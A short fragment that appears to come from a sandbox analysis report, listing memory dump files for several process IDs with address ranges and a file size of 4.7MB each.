              • memory/5580-32-0x0000000000810000-0x0000000000CC2000-memory.dmp

                Filesize

                4.7MB

              • memory/5580-47-0x0000000000810000-0x0000000000CC2000-memory.dmp

                Filesize

                4.7MB

              • memory/5600-64-0x0000000000A40000-0x0000000000EFB000-memory.dmp

                Filesize

                4.7MB

              • memory/5600-65-0x0000000000A40000-0x0000000000EFB000-memory.dmp

                Filesize

                4.7MB

              • memory/5744-163-0x0000000000210000-0x00000000006C2000-memory.dmp

                Filesize

                4.7MB

              • memory/5744-161-0x0000000000210000-0x00000000006C2000-memory.dmp

                Filesize

                4.7MB